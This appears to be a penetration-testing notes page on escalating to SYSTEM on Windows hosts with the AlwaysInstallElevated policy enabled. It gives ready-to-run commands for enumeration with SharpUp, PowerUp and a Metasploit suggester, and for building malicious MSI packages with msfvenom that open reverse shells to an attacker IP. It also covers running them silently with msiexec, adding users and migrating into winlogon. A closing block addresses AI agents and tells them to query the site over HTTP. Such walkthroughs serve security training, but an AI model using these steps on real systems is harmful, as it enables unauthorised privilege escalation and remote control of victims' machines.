# Always Installed Elevated exploitation

## Target requirements

* The target needs to have those values in the registry:
  * In `Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer` with the AlwaysInstallElevated set to 1
  * In `Computer\HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer` with the AlwaysInstallElevated set to 1 This means that installation packages are installed with elevated privileges

### Enumerate with cmd

* Type `reg query HKLM\Software\Policies\Microsoft\Windows\Installer` in a cmd prompt should be set to 1
* Type `reg query HKCU\Software\Policies\Microsoft\Windows\Installer` should be one as well\
  ![image](https://user-images.githubusercontent.com/96747355/162576171-430c4e05-d1be-42c4-a840-d844a87cb99e.png)

## Exploitation

* You should have a shell with covenant, metasploit or netcat or an access to the target.\
  We will use Covenant and Metasploit here.

### Covenant

#### Enumerate with SharpUp audit

* In your shell type `SharpUp audit`
* In the results you should see this:

  ```
  === AlwaysInstallElevated Registry Keys ===

    HKLM:    1
    HKCU:    1
  ```

#### Enumerate with powerup

* In the shell we will type PowerShellImport, type enter and fetch PoweUp.ps1 (if you do not have it you can get it [here](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) )
* Click on execute
* Type `powershell invoke-allchecks` in your shell
* We should see this

  ```
  [*] Checking for AlwaysInstallElevated registry key...
  AbuseFunction : Write-UserAddMSI
  ```

#### Exploitation

* generate a payload with msfvenom `msfvenom -p windows/exec CMD="" -f msi -o exploitalwaysinstalled.msi` between the quotes copy and paste an encoded launcher.
* Upload your file in the target using Upload command from covenant (type `Upload` and enter, file the file path for the target and browse to the file in your attack machine)
* run it using \`shell msiexec /quiet /qn /i exploitalwaysinstalled.msi
* We should get a prompt for another reverse shell in our grunts as an elevated user

  ```
  > whoami
  NT AUTHORITY\SYSTEM
  ```

#### Exploitation with powerup

* `powershell -ep bypass`
* `. .\PowerUp.ps1`
* `Write-UserAddMSI`
* It will set up a malicious MSI called `UserAdd`
* And we will be able to add a user\
  ![image](https://user-images.githubusercontent.com/96747355/162576431-66e49563-26cd-45fc-a673-63e9f0a42561.png)
* Our user has been added\
  ![image](https://user-images.githubusercontent.com/96747355/162576458-7498d8e5-bfc7-4dba-9b5c-9a73ac869622.png)

### Metasploit

* Interact with a session you should already have from initial foothold `sessions -i num-of-session`

#### Enumerate

* Launch `run post/multi/recon/local_exploit_suggester`
* You should see: `- exploit/windows/local/always_install_elevated: The target is vulnerable.`

#### Exploitation

* Background your session with ctrl z
* Type `use exploit/windows/local/always_install_elevated`
* set session to the number of the session you have on your target
* type `exploit -j`
* list the sessions you should have another one running as authority system
* type ps and look for a process under session 1 so that we can migrate to it
* We can use winlogon.exe `620 520 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe`
* Migrate to it using `migrate PID-number` in our example it is going to be `migrate 520`

**OR**

* `msfconsole`
* `use multi/handler`
* `set payload windows/meterpreter/reverse_tcp`
* `set lhost your-Kali-IP`
* `run`
* In another console tab `msfvenom -p windows/meterpreter/reverse_tcp lhost=Your-Kali-IP -f msi -o setup.msi`
* Get the generated msi in your target (python server -> browser from target)
* In your target Place `setup.msi` in a folder where you have write access
* Open command prompt and type: `msiexec /quiet /qn /i C:\Folder\you\chose\setup.msi`
* You should get an elevated shell in msfconsole\
  ![image](https://user-images.githubusercontent.com/96747355/162576948-dfc37754-0345-408f-a344-5248975f34b8.png)

### Other way

* Generate a malicious MSI package `msfvenom -p windows/shell_reverse_tcp lhost=IP-OF-ATTACK-MACHINE lport=PORT -f msi > file.msi`
* Set up a listener `rlwrap nc -lnvp CHOSEN-PORT`
* Upload it to the target and execute it from the cmd `msiexec /i c:\users\user\desktop\file.msi /quiet /qn /norestart`
* You should get an elevated shell

## Resources

{% embed url="<https://academy.tcm-sec.com/p/movement-pivoting-and-persistence-for-pentesters-and-ethical-hackers>" %}
TCM security Academy - Movement pivoting and persistence for pentesters and ethical hacker
{% endembed %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://csbygb.gitbook.io/pentips/windows/post-compromise-attack/alwaysinstallelevated.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.